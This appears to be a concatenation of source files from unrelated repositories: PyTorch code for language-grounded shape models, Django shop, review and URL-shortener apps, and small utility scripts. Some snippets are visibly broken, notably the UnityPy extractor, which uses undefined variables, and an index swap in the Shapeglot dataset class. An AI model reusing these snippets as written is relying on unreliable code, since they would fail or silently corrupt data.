preprocess: transform[ToTensor, Normalize]
Returns: AugmentAndMix Tensor
'''
mix = torch.zeros_like(preprocess(images))
w = self.dirichlet.sample()
for i in range(self.k):
aug = images.copy()
depth = np.random.randint(1, 4)
for _ in range(depth):
op = np.random.choice(self.augs)
aug = op(aug, 3)
mix = mix + w[i] * preprocess(aug)
m = self.beta.sample()
augmix = m * preprocess(images) + (1 - m) * mix
return augmix
def jensen_shannon(self, logits_o, logits_1, logits_2):
p_o = F.softmax(logits_o, dim=1)
p_1 = F.softmax(logits_1, dim=1)
p_2 = F.softmax(logits_2, dim=1)
# kl(q.log(), p) -> KL(p, q)
M = torch.clamp((p_o + p_1 + p_2) / 3, 1e-7, 1) # to avoid exploding
js = (self.kl(M.log(), p_o) + self.kl(M.log(), p_1) + self.kl(M.log(), p_2)) / 3
return js
``` |
{
"source": "63days/Transglot",
"score": 2
} |
#### File: transglot/in_out/shapeglot_dataset.py
```python
import numpy as np
from torch.utils.data import Dataset
import h5py
import os.path as osp
import torch
class ShapeglotDataset(Dataset):
def __init__(self, np_data, shuffle_geo=False, target_last=False):
"""
:param np_data:
:param shuffle_geo: if True, the positions of the shapes in context are randomly swapped.
"""
super(ShapeglotDataset, self).__init__()
self.data = np_data
self.shuffle_geo = shuffle_geo
self.target_last = target_last
def __getitem__(self, index):
text = self.data['text'][index].astype(np.long)
geos = self.data['in_geo'][index].astype(np.long)
target = self.data['target'][index]
idx = np.arange(len(geos))
if self.shuffle_geo:
np.random.shuffle(idx)
geos = geos[idx]
target = np.argmax(target[idx])
if self.target_last:
last = geos[-1]
geos[-1] = geos[target]
geos[target] = last
target = len(geos) - 1
return geos, target, text
def __len__(self):
return len(self.data)
class ShapeglotWithPCDataset(ShapeglotDataset):
def __init__(self, np_data, num_points=2048, shuffle_geo=False, target_last=False):
super().__init__(np_data=np_data, shuffle_geo=shuffle_geo, target_last=target_last)
self.num_points = num_points
cur_dir = osp.dirname(__file__)
self.pc_data = h5py.File(osp.join(cur_dir, '../../data/shapenet_chairs_only_in_game.h5'), 'r')['data'][:,:self.num_points]
def __getitem__(self, index):
text = self.data['text'][index].astype(np.long)
geos_idx = self.data['in_geo'][index].astype(np.long)
geos = self.pc_data[geos_idx]
target = self.data['target'][index]
idx = np.arange(len(geos))
if self.shuffle_geo:
np.random.shuffle(idx)
geos = torch.from_numpy(geos[idx]).float()
geos_idx = geos_idx[idx]
target = np.argmax(target[idx])
if self.target_last:
last = geos[-1]
last_idx = geos_idx[-1]
geos[-1] = geos[target]
geos_idx[-1] = geos_idx[target]
geos[target] = last
geos_idx[target] = last
target = len(geos) - 1
return geos, geos_idx, target, text
```
#### File: transglot/models/listener.py
```python
import torch
import torch.nn.functional as F
import pytorch_lightning as pl
from torch.utils.data import DataLoader
import os.path as osp
from transglot.models.point_encoder.pointnet import *
from transglot.models.point_encoder.pointnet2 import *
from transglot.models.point_encoder.point_transformer import PT
from transglot.models.point_encoder.pct import PCT
from transglot.models.encoders import LanguageEncoder, PretrainedFeatures
from transglot.models.neural_utils import MLPDecoder, smoothed_cross_entropy, MultiHeadAttention
from transglot.in_out.geometry import vgg_image_features, pc_ae_features
from transglot.in_out.shapeglot_dataset import ShapeglotWithPCDataset
from transglot.in_out.rnn_data_preprocessing import make_dataset_for_rnn_based_model
from transglot.simple_utils import unpickle_data
class BaseListener(pl.LightningModule):
def __init__(self, hparams):
super().__init__()
self.hparams = hparams
self._build_model()
self.incorrect_indices = []
def _build_model(self):
raise NotImplementedError
def forward(self, chairs, chairs_idx, tokens, dropout_rate=0.5):
raise NotImplementedError
def training_step(self, batch, batch_idx):
chairs, chairs_idx, targets, tokens = batch
outputs = self(chairs, chairs_idx, tokens)
loss = smoothed_cross_entropy(outputs['logits'], targets, 0)
if self.hparams["use_tnet"]:
mat_diff_loss = self.get_align_loss()
loss += 1e-3 * mat_diff_loss
preds = torch.max(outputs['logits'], 1)[1]
acc = (targets == preds).float().mean()
self.log('train_loss', loss, on_step=False, on_epoch=True)
self.log('train_acc', acc * 100, prog_bar=True, on_step=False, on_epoch=True)
return loss
def validation_step(self, batch, batch_idx):
chairs, chairs_idx, targets, tokens = batch
outputs = self(chairs, chairs_idx, tokens)
loss = smoothed_cross_entropy(outputs["logits"], targets, 0)
if self.hparams["use_tnet"]:
mat_diff_loss = self.get_align_loss()
loss += 1e-3 * mat_diff_loss
preds = torch.max(outputs["logits"], 1)[1]
acc = (targets == preds).float().mean()
self.log("val_loss", loss, on_step=False, on_epoch=True)
self.log("val_acc", acc * 100, prog_bar=True, on_step=False, on_epoch=True)
def test_step(self, batch, batch_idx):
chairs, chairs_idx, targets, tokens = batch
outputs = self(chairs, chairs_idx, tokens)
loss = smoothed_cross_entropy(outputs['logits'], targets, 0)
if self.hparams["use_tnet"]:
mat_diff_loss = self.get_align_loss()
loss += 1e-3 * mat_diff_loss
preds = torch.max(outputs['logits'], 1)[1]
check_correct = (targets==preds)
acc = check_correct.float().mean()
incorrect_idx = (check_correct==False).nonzero(as_tuple=True)[0]
incorrect_idx = incorrect_idx + batch_idx * self.hparams["batch_size"]
self.incorrect_indices += incorrect_idx.tolist()
self.log("test_loss", loss, on_step=False, on_epoch=True)
self.log("test_acc", acc * 100, prog_bar=True, on_step=False, on_epoch=True)
def configure_optimizers(self):
if self.hparams["optimizer"] == "adamw":
optimizer = torch.optim.AdamW(self.parameters(), lr=self.hparams["lr"],
weight_decay=self.hparams["weight_decay"])
else:
optimizer = torch.optim.Adam(self.parameters(), lr=self.hparams["lr"])
return optimizer
# return {'optimizer': optimizer,
# 'lr_scheduler': {
# 'scheduler': torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=len(self.train_ds),
# eta_min=0, last_epoch=-1),
# 'interval': 'step',
# 'frequency': 1
# }
# }
def get_align_loss(self):
mat_diff = torch.matmul(self.pc_encoder.transformk, self.pc_encoder.transformk.transpose(1, 2)) - \
torch.eye(64).cuda()
label_mat = torch.eye(64, dtype=torch.float32, device='cuda').expand(mat_diff.size(0), -1, -1)
mat_diff_loss = F.mse_loss(mat_diff, label_mat)
return mat_diff_loss
def prepare_data(self):
cur_dir = osp.dirname(__file__)
top_data_dir = osp.join(cur_dir, '../../data/main_data_for_chairs')
data_name='game_data.pkl'
game_data, word_to_int, int_to_word, int_to_sn_model, sn_model_to_int, sorted_sn_models = \
unpickle_data(osp.join(top_data_dir, data_name))
max_seq_len = 33 # Maximum size (in tokens) per utterance.
split_sizes = [0.8, 0.1, 0.1] # Train-val-test sizes.
random_seed = 2004
unique_test_geo = True # If true, the test/train/val splits have 'targets' that are disjoint sets.
only_correct = True # Drop all not correctly guessed instances.
net_data, split_ids, _, net_data_mask = \
make_dataset_for_rnn_based_model(game_data,
split_sizes,
max_seq_len,
drop_too_long=True,
only_correct=only_correct,
unique_test_geo=unique_test_geo,
replace_not_in_train=True,
geo_condition=None,
bias_train=False,
seed=random_seed,
only_easy=True)
self.train_ds = ShapeglotWithPCDataset(net_data['train'], num_points=self.hparams["num_points"])
self.val_ds = ShapeglotWithPCDataset(net_data['val'], num_points=self.hparams["num_points"])
self.test_ds = ShapeglotWithPCDataset(net_data['test'], num_points=self.hparams["num_points"])
self.int_to_sn_model = int_to_sn_model
self.vocab_size = len(int_to_word)
def _build_dataloader(self, ds, mode):
return DataLoader(ds,
batch_size=self.hparams["batch_size"],
shuffle=mode=='train',
num_workers=4,
pin_memory=True,
drop_last= mode=='train')
def train_dataloader(self):
return self._build_dataloader(self.train_ds, 'train')
def val_dataloader(self):
return self._build_dataloader(self.val_ds, 'val')
def test_dataloader(self):
return self._build_dataloader(self.test_ds, 'test')
def get_progress_bar_dict(self):
items = super().get_progress_bar_dict()
running_train_loss = self.trainer.train_loop.running_loss.mean()
if running_train_loss is not None:
avg_training_loss = running_train_loss.cpu().item()
else:
avg_training_loss = float('NaN')
items['loss'] = f'{avg_training_loss:.4f}'
items.pop('v_num', None)
return items
class Transglot(BaseListener):
def _build_model(self):
self.prepare_data()
self.hidden_dim = self.hparams["hidden_dim"]
attn_dim = self.hidden_dim // 2
self.cross_attn_layers = nn.ModuleList()
for i in range(self.hparams["attn_layers"]):
self.cross_attn_layers.append(MultiHeadAttention(n_head=self.hparams["num_heads"],
query_dim=attn_dim,
point_dim=self.hparams["point_output_dim"],
d_k=attn_dim // self.hparams["num_heads"],
d_v=attn_dim // self.hparams["num_heads"]))
mlp_dim = self.hparams["hidden_dim"]
self.language_encoder_attn = LanguageEncoder(n_hidden=self.hidden_dim//2,
embedding_dim=self.hparams["embedding_dim"],
vocab_size=self.vocab_size)
self.language_encoder_concat = LanguageEncoder(n_hidden=self.hidden_dim//2,
embedding_dim=self.hparams["embedding_dim"],
vocab_size=self.vocab_size)
pc_encoder_type = self.hparams["pc_encoder_type"]
pc_output_dim = self.hparams["point_output_dim"]
if pc_encoder_type == "pn":
self.pc_encoder = PN(output_dim=pc_output_dim)
elif pc_encoder_type == "pn2ssg":
self.pc_encoder = PN2SSG(output_dim=pc_output_dim)
elif pc_encoder_type == "pn2msg":
self.pc_encoder = PN2MSG(output_dim=pc_output_dim)
elif pc_encoder_type == "pt":
self.pc_encoder = PT(output_dim=pc_output_dim)
elif pc_encoder_type == "pct":
self.pc_encoder = PCT(output_dim=pc_output_dim)
if self.hparams["use_image"]:
top_pretrained_feat_dir = "./data/main_data_for_chairs/pretrained_features"
vgg_feats_file = osp.join(top_pretrained_feat_dir, 'shapenet_chair_vgg_fc7_embedding.pkl')
vgg_feats = vgg_image_features(self.int_to_sn_model, 'chair', vgg_feats_file, python2_to_3=True)
self.image_encoder = PretrainedFeatures(torch.Tensor(vgg_feats),
embed_size=self.hidden_dim)
self.logit_encoder = MLPDecoder(in_feat_dims=mlp_dim,
out_channels=[100, 50, 1],
use_b_norm=True)
def forward(self, chairs, chairs_idx, tokens, dropout_rate=0.5):
lang_feats = self.language_encoder_attn(tokens, init_feats=None)
lang_concat_feats = self.language_encoder_concat(tokens, init_feats=None)
# extract point cloud features #
B, k, N, _ = chairs.size()
chairs_group = chairs.contiguous().view(B*k, N, 3)
pc_feats = self.pc_encoder(chairs_group)
pc_feats = pc_feats.contiguous().view(B, k, -1, self.hparams["point_output_dim"]) #[B,3,num_point,point_output_dim]
#################################
logits = []
attn_weights = [[] for _ in range(self.hparams["attn_layers"])] #[i][j]=i-th attn_layer's j-th object
for i, l_feats in enumerate(lang_feats):
l_f_attn = l_feats.unsqueeze(1)
l_f_cat = lang_concat_feats[i]
p_f = pc_feats[:,i]
# Cross Attention j-iteration #
attn_feat = l_f_attn
for j in range(self.hparams["attn_layers"]):
attn_feat, attn_weight = self.cross_attn_layers[j](q=attn_feat,
k=p_f,
v=p_f)
attn_weight = attn_weight.squeeze(2) # [B,num_head,num_points]
attn_weights[j].append(attn_weight)
attn_feat = attn_feat.squeeze(1)
final_feat = torch.cat([l_f_cat, attn_feat], 1)
logits.append(self.logit_encoder(final_feat))
outputs = dict()
outputs["logits"] = torch.cat(logits, 1)
outputs["attn_weights"] = attn_weights
return outputs
class Shapeglot(BaseListener):
def _build_model(self):
self.prepare_data()
top_pretrained_feat_dir = "./data/main_data_for_chairs/pretrained_features"
vgg_feats_file = osp.join(top_pretrained_feat_dir, 'shapenet_chair_vgg_fc7_embedding.pkl')
vgg_feats = vgg_image_features(self.int_to_sn_model, 'chair', vgg_feats_file, python2_to_3=True)
pc_feats_file = osp.join(top_pretrained_feat_dir, 'shapenet_chair_pcae_128bneck_chamfer_embedding.npz')
pc_feats = pc_ae_features(self.int_to_sn_model, pc_feats_file)
if self.hparams["use_image"]:
self.image_encoder = PretrainedFeatures(torch.Tensor(vgg_feats),
embed_size=self.hparams["hidden_dim"])
self.language_encoder = LanguageEncoder(n_hidden=self.hparams["hidden_dim"],
embedding_dim=self.hparams["embedding_dim"],
vocab_size=self.vocab_size)
if self.hparams["pretrained"]:
self.pc_encoder = PretrainedFeatures(torch.Tensor(pc_feats),
embed_size=self.hparams["hidden_dim"])
else:
self.pc_encoder = PNCls(output_dim=self.hparams["point_output_dim"])
self.logit_encoder = MLPDecoder(in_feat_dims=self.hparams["hidden_dim"]*2,
out_channels=[100, 50, 1],
use_b_norm=True)
def forward(self, chair_pcs, chair_ids, padded_tokens, dropout_rate=0.5):
if self.hparams["pretrained"]:
logits = self._forward_pretrained(chair_ids, padded_tokens, dropout_rate)
else:
logits = self._forward_pointnet(chair_pcs, chair_ids, padded_tokens, dropout_rate)
outputs = dict()
outputs["logits"] = logits
return outputs
def _forward_pretrained(self, item_ids, padded_tokens, dropout_rate=0.5):
if self.hparams["use_image"]:
visual_feats = self.image_encoder(item_ids, dropout_rate)
lang_feats = self.language_encoder(padded_tokens, init_feats=visual_feats)
else:
lang_feats = self.language_encoder(padded_tokens, init_feats=None)
pc_feats = self.pc_encoder(item_ids, dropout_rate, pre_drop=False)
logits = []
for i, l_feats in enumerate(lang_feats):
if pc_feats is not None:
feats = torch.cat([l_feats, pc_feats[:, i]], 1)
else:
feats = l_feats
logits.append(self.logit_encoder(feats))
return torch.cat(logits, 1)
def _forward_pointnet(self, chair_pcs, chair_ids, padded_tokens, dropout_rate=0.5):
if self.hparams["use_image"]:
visual_feats = self.image_encoder(chair_ids, dropout_rate)
lang_feats = self.language_encoder(padded_tokens, init_feats=visual_feats)
else:
lang_feats = self.language_encoder(padded_tokens, init_feats=None)
B, k, N, _ = chair_pcs.size()
chairs_group = chair_pcs.contiguous().view(B * k, N, 3)
pc_feats = self.pc_encoder(chairs_group)
pc_feats = pc_feats.reshape(B, k, -1)
logits = []
for i, l_feats in enumerate(lang_feats):
feats = torch.cat([l_feats, pc_feats[:, i]], 1)
logits.append(self.logit_encoder(feats))
return torch.cat(logits, 1)
```
#### File: models/point_encoder/pct.py
```python
import torch
import torch.nn as nn
import math
class PCT(nn.Module):
def __init__(self, output_dim):
super().__init__()
self.input_embedding = NeighborEmbedding(3, 128, 16)
self.sa1 = OA(128)
self.sa2 = OA(128)
self.sa3 = OA(128)
self.sa4 = OA(128)
self.conv_fuse = nn.Sequential(
nn.Conv1d(4*128, 1024, 1),
nn.BatchNorm1d(1024),
nn.LeakyReLU(negative_slope=0.2)
)
self.convs1 = nn.Sequential(
nn.Conv1d(1024*3, 512, 1),
nn.BatchNorm1d(512),
nn.ReLU(),
nn.Dropout(0.5)
)
self.convs2 = nn.Sequential(
nn.Conv1d(512, 256, 1),
nn.BatchNorm1d(256),
nn.ReLU(),
nn.Conv1d(256, output_dim, 1)
)
def forward(self, x):
B,N,_=x.size()
x = self.input_embedding(x)
x1, attn1 = self.sa1(x)
x2, attn2 = self.sa2(x1)
x3, attn3 = self.sa3(x2)
x4, attn4 = self.sa4(x3)
x = torch.cat([x1, x2, x3, x4], dim=-1)
x = self.conv_fuse(x.transpose(1,2))
x_max = x.max(2)[0].unsqueeze(-1).repeat(1,1,N)
x_avg = x.mean(2).unsqueeze(-1).repeat(1,1,N)
x = torch.cat([x, x_max, x_avg], dim=1)
x = self.convs1(x)
x = self.convs2(x)
return x.transpose(1,2) #B,N,C
class NaiveEmbedding(nn.Module):
def __init__(self, input_dim, output_dim=128):
super().__init__()
self.mlp = nn.Sequential(
nn.Conv1d(input_dim, output_dim, 1),
nn.BatchNorm1d(output_dim),
nn.ReLU(True),
nn.Conv1d(output_dim, output_dim, 1),
nn.BatchNorm1d(output_dim),
nn.ReLU(True)
)
def forward(self, x):
return self.mlp(x.transpose(1,2)).transpose(1,2).contiguous()
class NeighborEmbedding(NaiveEmbedding):
def __init__(self, input_dim, output_dim=128, k=32):
super().__init__(input_dim, output_dim//2)
self.k = k
self.local_op = nn.Sequential(
nn.Conv1d(output_dim, output_dim, 1, bias=False),
nn.BatchNorm1d(output_dim),
nn.ReLU(),
nn.Conv1d(output_dim, output_dim, 1, bias=False),
nn.BatchNorm1d(output_dim),
nn.ReLU()
)
def forward(self, x):
xyz = x
x = self.mlp(x.transpose(1,2)).transpose(1,2).contiguous() #BND
x_repeat = x.unsqueeze(2).expand(-1,-1,self.k,-1) #BNkD
knn_idx = kNN_torch(xyz, xyz, k=self.k) # BNk
knn_x = gather_knn(x, knn_idx) # BNkD
x = knn_x - x_repeat
x = torch.cat([x, x_repeat], dim=-1) #B N k 2D
B, N, k, D = x.size()
x = x.transpose(2,3).reshape(-1, D, k) # B*N D k
x = self.local_op(x).reshape(B, N, D, k)
x = x.max(-1)[0] # B N D
return x
class SA(nn.Module):
def __init__(self, dim):
super().__init__()
self.to_q = nn.Linear(dim, dim//4)
self.to_k = nn.Linear(dim, dim//4)
self.to_v = nn.Linear(dim, dim)
self.lbr = nn.Sequential(
nn.Conv1d(dim, dim, 1),
nn.BatchNorm1d(dim),
nn.ReLU(True)
)
def forward(self, x):
q = self.to_q(x)
k = self.to_k(x)
v = self.to_v(x)
attn_weights = torch.einsum('bnd,bmd->bnm', q, k) / math.sqrt(q.size(-1))
attn_weights = torch.softmax(attn_weights, -1)
attn = torch.einsum('bnm,bmd->bnd', attn_weights, v)
return self.lbr(attn.transpose(1,2)).transpose(1,2).contiguous() + x, attn_weights
class OA(SA):
def __init__(self, dim):
super().__init__(dim)
def forward(self, x):
q = self.to_q(x)
k = self.to_k(x)
v = self.to_v(x)
attn_weights = torch.einsum('bnd,bmd->bnm', q, k)
attn_weights = torch.softmax(attn_weights, dim=1)
attn_weights = attn_weights / (1e-9 + torch.sum(attn_weights, 2, keepdim=True))
attn = torch.einsum('bnm,bmd->bnd', attn_weights, v)
return self.lbr((x-attn).transpose(1, 2)).transpose(1, 2).contiguous() + x, attn_weights
``` |
{
"source": "63phc/lks",
"score": 2
} |
#### File: apps/reviews/models.py
```python
from django.utils.translation import gettext_lazy as _
from django.db import models
from src.core.mixins.mixin import ImagesMixin
class Review(ImagesMixin):
title = models.CharField(_("Title"), max_length=63)
author = models.CharField(_("Author review"), max_length=63)
comment = models.CharField(_("Comment"), max_length=263)
email = models.EmailField(_("Email"), blank=True, null=True)
rating = models.PositiveSmallIntegerField(_("Rating"))
is_active = models.BooleanField(_("Active"), default=True)
created_at = models.DateTimeField(_("Created at"), auto_now_add=True)
class Meta:
verbose_name = _("Review")
verbose_name_plural = _("Reviews")
ordering = ("-created_at",)
def __str__(self):
return self.author
```
#### File: shop/models/category.py
```python
from django.db import models
from django.utils.translation import gettext_lazy as _
from django_extensions.db.fields import AutoSlugField
from src.core.mixins.mixin import SeoMixin
class Category(SeoMixin):
title = models.CharField(_("Title"), max_length=120)
slug = AutoSlugField(_("slug"), populate_from="title", editable=True)
class Meta:
verbose_name = _("Category")
verbose_name_plural = _("Categories")
def __str__(self):
return self.title
```
#### File: apps/shop/viewsets.py
```python
from rest_framework import status, mixins
from rest_framework.decorators import permission_classes
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet, GenericViewSet
from src.apps.shop.models.order import OrderCart, OrderCartItem
from src.apps.shop.serializers import (
OrderSerializer,
OrderItemSerializer,
CategoryRetrieveSerializer,
CategoryListSerializer,
ProductListSerializer,
ProductRetrieveSerializer,
OrderRetrieveSerializer,
)
from src.apps.shop.models import Product, Category
class ProductViewSet(ModelViewSet):
queryset = Product.objects.filter(is_active=True).prefetch_related("categories")
lookup_field = "slug"
http_method_names = ["get"]
serializer_classes = {
"list": ProductListSerializer,
"retrieve": ProductRetrieveSerializer,
}
def get_serializer_class(self):
return self.serializer_classes.get(self.action, ProductListSerializer)
class CategoryViewSet(ModelViewSet):
"""Category for products"""
queryset = Category.objects.all()
http_method_names = ["get"]
lookup_field = "slug"
pagination_class = None
serializer_classes = {
"list": CategoryListSerializer,
"retrieve": CategoryRetrieveSerializer,
}
def get_serializer_class(self):
return self.serializer_classes.get(self.action, CategoryListSerializer)
class OrderViewSet(mixins.CreateModelMixin, mixins.RetrieveModelMixin, GenericViewSet):
"""Viewsets order
```
{
"products": [{"product": int, "amount": int}, {"product": int, "amount": int}],
"prices": int,
"name": "str",
"phone": "str",
"address": "str",
"comments": "str"
}
```
"""
permission_classes = (AllowAny,)
queryset = OrderCart.objects.all()
http_method_names = ["post", "get"]
lookup_field = "order_number"
serializer_classes = {
"retrieve": OrderRetrieveSerializer,
"create": OrderSerializer,
}
def get_serializer_class(self):
return self.serializer_classes.get(self.action, OrderSerializer)
class OrderItemViewSet(ModelViewSet):
"""Viewsets order items"""
permission_classes = (AllowAny,)
serializer_class = OrderItemSerializer
queryset = OrderCartItem.objects.all()
http_method_names = ["post"]
```
#### File: apps/shorter/models.py
```python
from math import ceil
from uuid import uuid4
from django.conf import settings
from django.db import models
from django.utils.translation import gettext_lazy as _
def generate_short_code(length):
return "".join([uuid4().hex for _ in range(ceil(length / 32))])[:length]
class UrlShorter(models.Model):
url = models.URLField(_("Url"), max_length=1024)
url_short = models.CharField(max_length=6, unique=True)
count = models.IntegerField(default=0)
is_expired = models.BooleanField(default=False)
created_at = models.DateTimeField(verbose_name=_("Created"), auto_now_add=True)
updated_at = models.DateTimeField(_("Updated at"), auto_now=True)
def __str__(self):
return str(self.url)
class Meta:
verbose_name = "Short Link"
verbose_name_plural = "Short Links"
ordering = ("-created_at",)
def get_url_short(self):
return f"{settings.SHORT_URL}/{self.url_short}"
def save(
self,
force_insert=False,
force_update=False,
using=None,
update_fields=None,
):
if not self.url_short:
self.url_short = generate_short_code(length=6)
super().save()
```
#### File: src/tests/test_contacts.py
```python
import json
import pytest
@pytest.mark.django_db
@pytest.mark.urls("apps.contacts.urls")
def test_send_contacts_data(client):
data = {
"name": "hello",
"message": "world",
"phone_number": "88002000600",
"email": "<EMAIL>",
"company": "hello_world inc.",
}
assert (
client.post(
"/contacts/", data=json.dumps(data), content_type="application/json"
).status_code
== 201
)
@pytest.mark.django_db
@pytest.mark.urls("apps.contacts.urls")
def test_send_contacts_bad_data_email(client):
data = {
"name": "hello",
"message": "world",
"phone_number": "88002000600",
"email": "<EMAIL>",
"company": "hello_world inc.",
}
assert (
client.post(
"/contacts/", data=json.dumps(data), content_type="application/json"
).status_code
== 400
)
``` |
{
"source": "641i130/keygen",
"score": 3
} |
#### File: keygen/bin/json_merge.py
```python
import sys
import json
def read_json_file(fn):
with open(fn) as f:
return json.load(f)
combined = [read_json_file(fn) for fn in sys.argv[1:]]
print(json.dumps(combined))
``` |
{
"source": "641i130/klbvfs",
"score": 3
} |
#### File: 641i130/klbvfs/extract.py
```python
import os
import UnityPy
from PIL import Image
def unpack_all_assets(source_folder : str, destination_folder : str):
# iterate over all files in source folder
for root, dirs, files in os.walk(source_folder):
for file_name in files:
# generate file_path
file_path = os.path.join(root, file_name)
# load that file via UnityPy.load
env = UnityPy.load(file_path)
# iterate over internal objects
for obj in env.objects:
# process specific object types
if obj.type.name in ["Texture2D", "Sprite"]:
# parse the object data
data = obj.read()
# create destination path
dest = os.path.join(destination_folder, data.name)
# make sure that the extension is correct
# you probably only want to do so with images/textures
dest, ext = os.path.splitext(dest)
dest = dest + ".png"
img = data.image
img.save(dest)
if obj.type.name == "TextAsset":
# export asset
data = image.read()
with open(path, "wb") as f:
f.write(bytes(data.script))
# edit asset
fp = os.path.join(replace_dir, data.name)
with open(fp, "rb") as f:
data.script = f.read()
data.save()
if obj.type.name == "Mesh":
mesh : Mesh = obj.read()
with open(f"{mesh.name}.obj", "wt", newline = "") as f:
# newline = "" is important
f.write(mesh.export())
if obj.type.name == "Font":
font : Font = obj.read()
if font.m_FontData:
extension = ".ttf"
if font.m_FontData[0:4] == b"OTTO":
extension = ".otf"
with open(os.path.join(path, font.name+extension), "wb") as f:
f.write(font.m_FontData)
unpack_all_assets(".",".")
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.